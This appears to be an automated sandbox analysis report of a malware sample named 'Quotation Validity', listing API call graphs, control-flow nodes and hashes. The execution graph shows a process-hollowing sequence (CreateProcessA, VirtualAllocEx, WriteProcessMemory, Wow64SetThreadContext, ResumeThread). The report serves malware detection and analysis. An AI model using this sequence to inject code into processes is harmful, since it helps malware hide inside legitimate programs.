                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x7ff613480000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:11.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:4.9%
                                                                                Total number of Nodes:345
                                                                                Total number of Limit Nodes:18
                                                                                execution_graph 48337 182d560 48338 182d5a6 GetCurrentProcess 48337->48338 48340 182d5f1 48338->48340 48341 182d5f8 GetCurrentThread 48338->48341 48340->48341 48342 182d635 GetCurrentProcess 48341->48342 48343 182d62e 48341->48343 48344 182d66b 48342->48344 48343->48342 48345 182d693 GetCurrentThreadId 48344->48345 48346 182d6c4 48345->48346 48410 78abbf8 48411 78abd83 48410->48411 48413 78abc1e 48410->48413 48413->48411 48414 78a6428 48413->48414 48415 78abe78 PostMessageW 48414->48415 48416 78abee4 48415->48416 48416->48413 47975 32d7338 47976 32d7365 47975->47976 47989 32d6e9c 47976->47989 47980 32d742b 47981 32d6eac GetModuleHandleW 47980->47981 47982 32d745d 47981->47982 47983 32d6eac GetModuleHandleW 47982->47983 47984 32d748f 47983->47984 47985 32d6e9c GetModuleHandleW 47984->47985 47986 32d74c1 47985->47986 47998 32d6ecc 47986->47998 47988 32d7525 47990 32d6ea7 47989->47990 47991 32d73f9 47990->47991 48005 32d7054 47990->48005 47993 32d6eac 47991->47993 47994 32d6eb7 47993->47994 47995 32d8fdb 47994->47995 47996 1825b00 GetModuleHandleW 47994->47996 47997 182880f GetModuleHandleW 47994->47997 47995->47980 47996->47995 47997->47995 47999 32d6ed7 47998->47999 48000 32d9f6d 47999->48000 48060 1825ad0 47999->48060 48064 18275fc 47999->48064 48070 18274da 47999->48070 48074 18275c0 47999->48074 48000->47988 48006 32d705f 48005->48006 48010 1825b00 48006->48010 48016 182880f 48006->48016 48007 32d8d64 48007->47991 48011 1825b0b 48010->48011 48013 1828aeb 48011->48013 48022 182ad90 48011->48022 48012 1828b29 48012->48007 48013->48012 48027 182ce80 48013->48027 48017 1828816 48016->48017 48019 1828aeb 48017->48019 48020 182ad90 GetModuleHandleW 48017->48020 48018 1828b29 48018->48007 48019->48018 48021 182ce80 GetModuleHandleW 48019->48021 48020->48019 48021->48018 48023 182ad95 48022->48023 48032 182b1d0 48023->48032 48035 182b1c1 48023->48035 48024 182ada6 48024->48013 48028 182ceb1 48027->48028 48029 182ced5 48028->48029 48044 182d438 48028->48044 48048 182d448 48028->48048 48029->48012 48039 182b2b7 48032->48039 48033 182b1df 48033->48024 48036 182b1d0 48035->48036 48038 182b2b7 GetModuleHandleW 48036->48038 48037 182b1df 48037->48024 48038->48037 48040 182b2fc 48039->48040 48041 182b2d9 48039->48041 48040->48033 48041->48040 48042 182b500 GetModuleHandleW 48041->48042 48043 182b52d 48042->48043 48043->48033 48045 182d448 48044->48045 48047 182d48f 48045->48047 48052 182d240 48045->48052 48047->48029 48049 182d455 48048->48049 48050 182d240 GetModuleHandleW 48049->48050 48051 182d48f 48049->48051 48050->48051 48051->48029 48053 182d245 48052->48053 48055 182dda0 48053->48055 48056 182d36c 48053->48056 48055->48055 48057 182d377 48056->48057 48058 1825b00 GetModuleHandleW 48057->48058 48059 182de0f 48058->48059 48059->48055 48061 1825adb 48060->48061 48062 1825b00 GetModuleHandleW 48061->48062 48063 182758d 48062->48063 48063->48000 48065 182760a 48064->48065 48067 1827577 48064->48067 48066 18275c3 48066->48000 48067->48066 48068 1825b00 GetModuleHandleW 48067->48068 48069 182758d 48068->48069 48069->48000 48071 1827497 48070->48071 48071->48070 48072 1825b00 GetModuleHandleW 48071->48072 48073 182758d 48072->48073 48073->48000 48075 1827577 48074->48075 48076 18275c3 48074->48076 48077 1825b00 GetModuleHandleW 48075->48077 48076->48000 48078 182758d 48077->48078 48078->48000 48167 159d01c 48168 159d034 48167->48168 48169 159d08e 48168->48169 48174 32d11fc 48168->48174 48178 32d1f77 48168->48178 48182 32d1f88 48168->48182 48186 32d2ce9 48168->48186 48175 32d1207 48174->48175 48177 32d2d49 48175->48177 48190 32d1324 CallWindowProcW 48175->48190 48177->48177 48179 32d1f7e 48178->48179 48180 32d11fc CallWindowProcW 48179->48180 48181 32d1fcf 48180->48181 48181->48169 48183 32d1fae 48182->48183 48184 32d11fc CallWindowProcW 48183->48184 48185 32d1fcf 48184->48185 48185->48169 48187 32d2cf8 48186->48187 48189 32d2d49 48187->48189 48191 32d1324 CallWindowProcW 48187->48191 48189->48189 48190->48177 48191->48189 48084 82e1f18 48088 82e1f40 48084->48088 48092 82e1f50 48084->48092 48085 82e1f37 48089 82e1f50 48088->48089 48096 82e1f88 48089->48096 48090 82e1f7e 48090->48085 48093 82e1f59 48092->48093 48095 82e1f88 DrawTextExW 48093->48095 48094 82e1f7e 48094->48085 48095->48094 48097 82e1fc2 48096->48097 48098 82e1fd3 48096->48098 48097->48090 48099 82e2061 48098->48099 48102 82e22b0 48098->48102 48107 82e22c0 48098->48107 48099->48090 48103 82e22c0 48102->48103 48104 82e23ee 48103->48104 48112 82e54f0 48103->48112 48117 82e54e1 48103->48117 48104->48097 48108 82e22e8 48107->48108 48109 82e23ee 48108->48109 48110 82e54f0 DrawTextExW 48108->48110 48111 82e54e1 DrawTextExW 48108->48111 48109->48097 48110->48109 48111->48109 48113 82e5506 48112->48113 48122 82e5958 48113->48122 48126 82e5949 48113->48126 48114 82e557c 48114->48104 48118 82e54f0 48117->48118 48120 82e5958 DrawTextExW 48118->48120 48121 82e5949 DrawTextExW 48118->48121 48119 82e557c 48119->48104 48120->48119 48121->48119 48131 82e5998 48122->48131 48136 82e5989 48122->48136 48123 82e5976 48123->48114 48127 82e5958 48126->48127 48129 82e5998 DrawTextExW 48127->48129 48130 82e5989 DrawTextExW 48127->48130 48128 82e5976 48128->48114 48129->48128 48130->48128 48132 82e59b5 48131->48132 48133 82e59f6 48132->48133 48141 82e5a08 48132->48141 48146 82e5a18 48132->48146 48133->48123 48137 82e5992 48136->48137 48138 82e59f6 48137->48138 48139 82e5a08 DrawTextExW 48137->48139 48140 82e5a18 DrawTextExW 48137->48140 48138->48123 48139->48138 48140->48138 48143 82e5a18 48141->48143 48142 82e5a4e 48142->48133 48143->48142 48151 82e4060 48143->48151 48145 82e5aa9 48148 82e5a39 48146->48148 48147 82e5a4e 48147->48133 48148->48147 48149 82e4060 DrawTextExW 48148->48149 48150 82e5aa9 48149->48150 48153 82e406b 48151->48153 48152 82e5e39 48152->48145 48153->48152 48157 82e67e0 48153->48157 48160 82e67d0 48153->48160 48154 82e5f4b 48154->48145 48163 82e419c 48157->48163 48161 82e67fd 48160->48161 48162 82e419c DrawTextExW 48160->48162 48161->48154 48162->48161 48164 82e6818 DrawTextExW 48163->48164 48166 82e67fd 48164->48166 48166->48154 48347 82e6c48 48348 82e6c82 48347->48348 48349 82e6cfe 48348->48349 48350 82e6d13 48348->48350 48355 82e41c4 48349->48355 48351 82e41c4 3 API calls 48350->48351 48353 82e6d22 48351->48353 48356 82e41cf 48355->48356 48357 82e6d09 48356->48357 48360 82e7668 48356->48360 48366 82e7657 48356->48366 48372 82e420c 48360->48372 48363 82e768f 48363->48357 48364 82e76b8 CreateIconFromResourceEx 48365 82e7736 48364->48365 48365->48357 48367 82e7682 48366->48367 48368 82e420c CreateIconFromResourceEx 48366->48368 48369 82e768f 48367->48369 48370 82e76b8 CreateIconFromResourceEx 48367->48370 48368->48367 48369->48357 48371 82e7736 48370->48371 48371->48357 48373 82e76b8 CreateIconFromResourceEx 48372->48373 48374 82e7682 48373->48374 48374->48363 48374->48364 48079 82e64b9 48080 82e64c0 CloseHandle 48079->48080 48081 82e6527 48080->48081 48082 182d7a8 DuplicateHandle 48083 182d83e 48082->48083 48375 1824668 48376 1824684 48375->48376 48377 18246a4 48376->48377 48381 1824838 48376->48381 48386 18243e8 48377->48386 48379 18246c3 48382 182485d 48381->48382 48390 1824937 48382->48390 48394 1824948 48382->48394 48387 18243f3 48386->48387 48402 1825a80 48387->48402 48389 1827234 48389->48379 48391 1824948 48390->48391 48393 1824a4c 48391->48393 48398 1824544 48391->48398 48396 182496f 48394->48396 48395 1824a4c 48395->48395 48396->48395 48397 1824544 CreateActCtxA 48396->48397 48397->48395 48399 1825dd8 CreateActCtxA 48398->48399 48401 1825e9b 48399->48401 48403 1825a8b 48402->48403 48406 1825aa0 48403->48406 48405 18273b5 48405->48389 48407 1825aab 48406->48407 48408 1825ad0 GetModuleHandleW 48407->48408 48409 182749a 48408->48409 48409->48405 48192 78aa9c6 48193 78aa954 48192->48193 48195 78aa9c9 48192->48195 48208 78ab38a 48193->48208 48212 78aad65 48193->48212 48217 78ab304 48193->48217 48222 78aaf27 48193->48222 48230 78ab441 48193->48230 48234 78aafc1 48193->48234 48239 78aad7c 48193->48239 48245 78ab07c 48193->48245 48251 78aae6e 48193->48251 48259 78ab0e9 48193->48259 48264 78ab3db 48193->48264 48268 78ab21a 48193->48268 48194 78aa9a6 48272 78a99d8 48208->48272 48276 78a99d0 48208->48276 48209 78ab202 48209->48194 48213 78aad6f 48212->48213 48280 78a9b70 48213->48280 48284 78a9b64 48213->48284 48218 78ab314 48217->48218 48288 78a9268 48218->48288 48292 78a9260 48218->48292 48219 78ab55e 48223 78aaf2a 48222->48223 48296 78abb30 48223->48296 48301 78abb40 48223->48301 48224 78aaf43 48228 78a9268 ResumeThread 48224->48228 48229 78a9260 ResumeThread 48224->48229 48225 78ab55e 48225->48225 48228->48225 48229->48225 48231 78ab5b7 48230->48231 48314 78a98e8 48231->48314 48318 78a98e0 48231->48318 48235 78aafc7 48234->48235 48237 78a9268 ResumeThread 48235->48237 48238 78a9260 ResumeThread 48235->48238 48236 78ab55e 48237->48236 48238->48236 48241 78aad6f 48239->48241 48240 78aae23 48242 78aadaa 48241->48242 48243 78a9b70 CreateProcessA 48241->48243 48244 78a9b64 CreateProcessA 48241->48244 48242->48194 48243->48240 48244->48240 48322 78a9828 48245->48322 48326 78a9821 48245->48326 48246 78ab09a 48247 78a98e8 WriteProcessMemory 48246->48247 48248 78a98e0 WriteProcessMemory 48246->48248 48247->48246 48248->48246 48252 78aae8d 48251->48252 48253 78aaf43 48252->48253 48257 78abb30 2 API calls 48252->48257 48258 78abb40 2 API calls 48252->48258 48255 78a9268 ResumeThread 48253->48255 48256 78a9260 ResumeThread 48253->48256 48254 78ab55e 48255->48254 48256->48254 48257->48253 48258->48253 48260 78ab10c 48259->48260 48262 78a98e8 WriteProcessMemory 48260->48262 48263 78a98e0 WriteProcessMemory 48260->48263 48261 78aaf79 48261->48194 48262->48261 48263->48261 48266 78a9749 Wow64SetThreadContext 48264->48266 48267 78a9750 Wow64SetThreadContext 48264->48267 48265 78aae55 48265->48194 48266->48265 48267->48265 48270 78a98e8 WriteProcessMemory 48268->48270 48271 78a98e0 WriteProcessMemory 48268->48271 48269 78ab1d8 48270->48269 48271->48269 48273 78a9a23 ReadProcessMemory 48272->48273 48275 78a9a67 48273->48275 48275->48209 48277 78a9a23 ReadProcessMemory 48276->48277 48279 78a9a67 48277->48279 48279->48209 48281 78a9bf9 48280->48281 48281->48281 48282 78a9d5e CreateProcessA 48281->48282 48283 78a9dbb 48282->48283 48283->48283 48285 78a9b70 CreateProcessA 48284->48285 48287 78a9dbb 48285->48287 48287->48287 48289 78a92a8 ResumeThread 48288->48289 48291 78a92d9 48289->48291 48291->48219 48293 78a92a8 ResumeThread 48292->48293 48295 78a92d9 48293->48295 48295->48219 48297 78abb55 48296->48297 48306 78a9749 48297->48306 48310 78a9750 48297->48310 48298 78abb6b 48298->48224 48302 78abb55 48301->48302 48304 78a9749 Wow64SetThreadContext 48302->48304 48305 78a9750 Wow64SetThreadContext 48302->48305 48303 78abb6b 48303->48224 48304->48303 48305->48303 48307 78a9795 Wow64SetThreadContext 48306->48307 48309 78a97dd 48307->48309 48309->48298 48311 78a9795 Wow64SetThreadContext 48310->48311 48313 78a97dd 48311->48313 48313->48298 48315 78a9930 WriteProcessMemory 48314->48315 48317 78a9987 48315->48317 48317->48231 48319 78a9930 WriteProcessMemory 48318->48319 48321 78a9987 48319->48321 48321->48231 48323 78a9868 VirtualAllocEx 48322->48323 48325 78a98a5 48323->48325 48325->48246 48327 78a9868 VirtualAllocEx 48326->48327 48329 78a98a5 48327->48329 48329->48246 48417 32d1dd0 48418 32d1e38 CreateWindowExW 48417->48418 48420 32d1ef4 48418->48420 48330 32d4372 48331 32d438d 48330->48331 48332 32d448c 48331->48332 48333 32d43e2 48331->48333 48334 32d11fc CallWindowProcW 48332->48334 48335 32d443a CallWindowProcW 48333->48335 48336 32d43e9 48333->48336 48334->48336 48335->48336

                                                                                Executed Functions

                                                                                Function 032D7338 Relevance: 4.0, Strings: 2, Instructions: 1497COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 46 32d7338-32d7363 47 32d736a-32d77c7 call 32d6e9c call 32d6eac * 3 call 32d6e9c call 32d6ebc call 32d6ecc call 32d6ebc * 2 call 32d6edc * 2 call 32def79 call 32df970 * 2 46->47 48 32d7365 46->48 122 32d77c9-32d77cf 47->122 123 32d77d1-32d77d8 47->123 48->47 124 32d77e5-32d8a7c call 32d6eec call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6f44 call 32d6f54 call 32d6f64 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6f74 call 32d6f64 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6f74 call 32d6f64 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6f44 call 32d6f54 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f84 call 32d6f94 call 32d6fa4 call 32d6fb4 * 2 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f94 call 32d6fa4 call 32d6f74 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f94 call 32d6fa4 call 32d6f74 call 32d6fc4 call 32d6fd4 call 32d6fe4 call 32d6fc4 call 32d6fd4 call 32d6fe4 call 32d6ff4 call 32d7004 call 32d7014 call 32d6fb4 * 3 122->124 125 32d77df-32d77e2 123->125 126 32d77da 123->126 365 32d8a7f call 82e1ba8 124->365 366 32d8a7f call 82e1b99 124->366 125->124 126->125 330 32d8a82-32d8aa8 call 32d6fb4 367 32d8aab call 82e1ba8 330->367 368 32d8aab call 82e1b99 330->368 333 32d8aae-32d8b5d call 32d6fb4 * 3 344 32d8b5f-32d8b6b 333->344 345 32d8b87 333->345 347 32d8b6d-32d8b73 344->347 348 32d8b75-32d8b7b 344->348 346 32d8b8d-32d8c89 call 32d7024 call 32d7034 call 32d6f0c call 32d7044 345->346 364 32d8c8e-32d8c96 346->364 349 32d8b85 347->349 348->349 349->346 365->330 366->330 367->333 368->333
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '2q$$2q
                                                                                • API String ID: 0-1962809717
                                                                                • Opcode ID: 9f0fac483eef0a6f3aa64facf53cc482cf82e68967ddd5aa6de12b7010e15f53
                                                                                • Instruction ID: 5f0e291bdccfd74e2de3a0a9be97d79364b7b0bb9a156f23c579f2d29b362544
                                                                                • Opcode Fuzzy Hash: 9f0fac483eef0a6f3aa64facf53cc482cf82e68967ddd5aa6de12b7010e15f53
                                                                                • Instruction Fuzzy Hash: E9F2D534A21319CFDB55DF64C888A99B7B1FF89300F5182E9E409AB261DB71AEC5CF40
                                                                                Function 032D732A Relevance: 4.0, Strings: 2, Instructions: 1491COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 372 32d732a-32d7363 374 32d736a-32d73de 372->374 375 32d7365 372->375 383 32d73e8-32d73f4 call 32d6e9c 374->383 375->374 385 32d73f9-32d7410 383->385 387 32d741a-32d7426 call 32d6eac 385->387 389 32d742b-32d750a call 32d6eac * 2 call 32d6e9c call 32d6ebc 387->389 407 32d7514-32d7520 call 32d6ecc 389->407 409 32d7525-32d7669 call 32d6ebc * 2 call 32d6edc * 2 407->409 431 32d7674-32d7675 409->431 432 32d767f-32d76b4 431->432 436 32d76bf-32d76d8 call 32def79 432->436 437 32d76de-32d7749 436->437 443 32d7751-32d7760 call 32df970 437->443 444 32d7766-32d7794 443->444 446 32d779b-32d77aa call 32df970 444->446 447 32d77b0-32d77c7 446->447 449 32d77c9-32d77cf 447->449 450 32d77d1-32d77d8 447->450 451 32d77e5-32d77f4 449->451 452 32d77df-32d77e2 450->452 453 32d77da 450->453 454 32d77ff-32d780f call 32d6eec 451->454 452->451 453->452 456 32d7814-32d7836 454->456 457 32d7841-32d7855 call 32d6efc 456->457 459 32d785a-32d790e call 32d6f0c 457->459 464 32d7918-32d7932 call 32d6f24 459->464 466 32d7937-32d79eb call 32d6f34 call 32d6f44 call 32d6f54 464->466 477 32d79f5-32d7a3e call 32d6f64 466->477 480 32d7a44-32d8256 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6f74 call 32d6f64 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6f74 call 32d6f64 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6f44 call 32d6f54 call 32d6efc call 32d6f0c call 32d6f24 477->480 561 32d825b-32d826f call 32d6f84 480->561 563 32d8274-32d829e call 32d6f94 call 32d6fa4 561->563 567 32d82a3-32d82d0 563->567 569 32d82d6-32d82ff call 32d6fb4 567->569 572 32d8304-32d831e 569->572 573 32d8324-32d8851 call 32d6fb4 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f34 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f94 call 32d6fa4 call 32d6f74 call 32d6efc call 32d6f0c call 32d6f24 call 32d6f94 call 32d6fa4 call 32d6f74 call 32d6fc4 572->573 627 32d885b-32d8875 call 32d6fd4 573->627 629 32d887a-32d8a5d call 32d6fe4 call 32d6fc4 call 32d6fd4 call 32d6fe4 call 32d6ff4 call 32d7004 call 32d7014 call 32d6fb4 * 3 627->629 656 32d8a62-32d8a7c 629->656 692 32d8a7f call 82e1ba8 656->692 693 32d8a7f call 82e1b99 656->693 657 32d8a82-32d8a89 call 32d6fb4 659 32d8a8e-32d8aa8 657->659 694 32d8aab call 82e1ba8 659->694 695 32d8aab call 82e1b99 659->695 660 32d8aae-32d8b5d call 32d6fb4 * 3 671 32d8b5f-32d8b6b 660->671 672 32d8b87 660->672 674 32d8b6d-32d8b73 671->674 675 32d8b75-32d8b7b 671->675 673 32d8b8d-32d8c2c call 32d7024 call 32d7034 call 32d6f0c 672->673 685 32d8c38-32d8c47 673->685 676 32d8b85 674->676 675->676 676->673 686 32d8c4e-32d8c68 685->686 688 32d8c74-32d8c89 call 32d7044 686->688 691 32d8c8e-32d8c96 688->691 692->657 693->657 694->660 695->660
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302652584.00000000032D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_32d0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '2q$$2q
                                                                                • API String ID: 0-1962809717
                                                                                • Opcode ID: d153afda3d08d74525bb183ab0c17994ecec6966cc2ba92478838c6b4e4d5913
                                                                                • Instruction ID: aed787e91ad6986c6dea0fd09b746c24c0b6993b1ea0f9a323269320fac63042
                                                                                • Opcode Fuzzy Hash: d153afda3d08d74525bb183ab0c17994ecec6966cc2ba92478838c6b4e4d5913
                                                                                • Instruction Fuzzy Hash: 78F2E534A21319CFDB55DF64C898A99B7B1FF89300F5182E9E409AB261DB71AEC5CF40
                                                                                Function 082E41C4 Relevance: .6, Instructions: 622COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4cd3ebefe07d37c925e1556e99614ebf56d83a09c33dc84bc47cfa7e7ad8817f
                                                                                • Instruction ID: c3a5d02c9700cadd3d1f94f62234b67d9235c0415ccd6acd4bdbdf9fc67f7932
                                                                                • Opcode Fuzzy Hash: 4cd3ebefe07d37c925e1556e99614ebf56d83a09c33dc84bc47cfa7e7ad8817f
                                                                                • Instruction Fuzzy Hash: D4327F70E102198FDB54DFA8C85079EBBF2BF88301F54816AE449AB385EB349D46CF95
                                                                                Function 082E6D31 Relevance: .3, Instructions: 280COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d767156b1b58de89fec8079b47a207c1e8a31d4abd5dbd658b306609d67bb254
                                                                                • Instruction ID: c633311c7cf86ba45af7ca1bb23c57c8f78d8e8400c43c48a7094851515f05c0
                                                                                • Opcode Fuzzy Hash: d767156b1b58de89fec8079b47a207c1e8a31d4abd5dbd658b306609d67bb254
                                                                                • Instruction Fuzzy Hash: 04C16A35A10219CFCF14DFA5C880799BBF2BF89311F54C1AAE809AB255EB70D985CF54
                                                                                Function 082EF788 Relevance: .2, Instructions: 239COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d23fc258c74339d4e56c690da8a5f0fecc5cc24346a0880d3cdc120e9e7f8c1
                                                                                • Instruction ID: 09af993bf5e287c216cafd1bf862e55276ea9cdf54bff6d44851f72fa51b30d3
                                                                                • Opcode Fuzzy Hash: 4d23fc258c74339d4e56c690da8a5f0fecc5cc24346a0880d3cdc120e9e7f8c1
                                                                                • Instruction Fuzzy Hash: 83A12274D25228CFDB28CFA5D944BEDBBB6BF89301F40D1A9E409AB241DB740A85CF44
                                                                                Function 082EF778 Relevance: .2, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307768451.00000000082E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082E0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_82e0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 63e97b3c849ff9d842de56b9c30bb4d785797d807e36771be80e16d73cdb07b8
                                                                                • Instruction ID: 6734df643b064588e10226cd616d22950db8485b0e3b44614cfe2da45c20a48a
                                                                                • Opcode Fuzzy Hash: 63e97b3c849ff9d842de56b9c30bb4d785797d807e36771be80e16d73cdb07b8
                                                                                • Instruction Fuzzy Hash: 8AA11174D25228CFDB28CFA5D944BEDBBB2BF89301F5091A9E409AB245DB740A85CF44
                                                                                Function 078A2838 Relevance: .2, Instructions: 226COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1307509387.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_78a0000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 35d2e1e54d00754ce1a53bede45468a64b8730c3fb78b5d0ac952e907c5f5244
                                                                                • Instruction ID: 929e390ad16e01f47f8f5be66e8b269c7e51ea2357f1272c096819917de62fbc
                                                                                • Opcode Fuzzy Hash: 35d2e1e54d00754ce1a53bede45468a64b8730c3fb78b5d0ac952e907c5f5244
                                                                                • Instruction Fuzzy Hash: F89158B4A05209EFEB30CF58C584A9EFBB9FFAA314F159195D049AB202C730E985CF55
                                                                                Function 01827051 Relevance: .2, Instructions: 207COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bbca81b4bed8fcd83f4462a601461cd1c4f46d540101ec647f3c40e2a5f9071b
                                                                                • Instruction ID: 4f75fa51652a09f356ea8ca9bb4b6d60185d321a6bbb94e8dd356dce8a739e24
                                                                                • Opcode Fuzzy Hash: bbca81b4bed8fcd83f4462a601461cd1c4f46d540101ec647f3c40e2a5f9071b
                                                                                • Instruction Fuzzy Hash: CC91E374E0024D8FDB05DFA9C850AEEBBB2FF98310F248069D915AB365DB356982CF51
                                                                                Function 018243E8 Relevance: .2, Instructions: 192COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 963f6b826dadf9c99336a12c40dd8e1e4f0814f76160cf78925cd09a9eeac21f
                                                                                • Instruction ID: 31bb51874e7d1f9391e908440865c2679b0fea69cbfcd7b7c712e9d9910978b0
                                                                                • Opcode Fuzzy Hash: 963f6b826dadf9c99336a12c40dd8e1e4f0814f76160cf78925cd09a9eeac21f
                                                                                • Instruction Fuzzy Hash: 8281B474E0020D8FDB04DFA9C950AEEBBB2FF98310F248069D91AAB364DB755991CF50
                                                                                Function 0182D550 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0182D5DE
                                                                                • GetCurrentThread.KERNEL32 ref: 0182D61B
                                                                                • GetCurrentProcess.KERNEL32 ref: 0182D658
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0182D6B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 1f57d7deb8bc656a8249766996fafcbf34350380d0e00b8646be16716e64c163
                                                                                • Instruction ID: 5500c7174e01336c03f2fc7e1661b0dbcbea12c02a28ab04276197f7cd065e1d
                                                                                • Opcode Fuzzy Hash: 1f57d7deb8bc656a8249766996fafcbf34350380d0e00b8646be16716e64c163
                                                                                • Instruction Fuzzy Hash: 525187B09003498FDB24DFAAD548BDEBFF1AF48314F248169D419A7390DB749984CBA6
                                                                                Function 0182D560 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0182D5DE
                                                                                • GetCurrentThread.KERNEL32 ref: 0182D61B
                                                                                • GetCurrentProcess.KERNEL32 ref: 0182D658
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0182D6B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.1302052576.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1820000_Quotation Validity.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 45f61e420279484e919ceccc91f249d339bfc22aa40fc98377750da3038d924d
                                                                                • Instruction ID: 6bcffbffdd175f621112d00b566a453da6169650c3f1688346526c125d23d44f
                                                                                • Opcode Fuzzy Hash: 45f61e420279484e919ceccc91f249d339bfc22aa40fc98377750da3038d924d
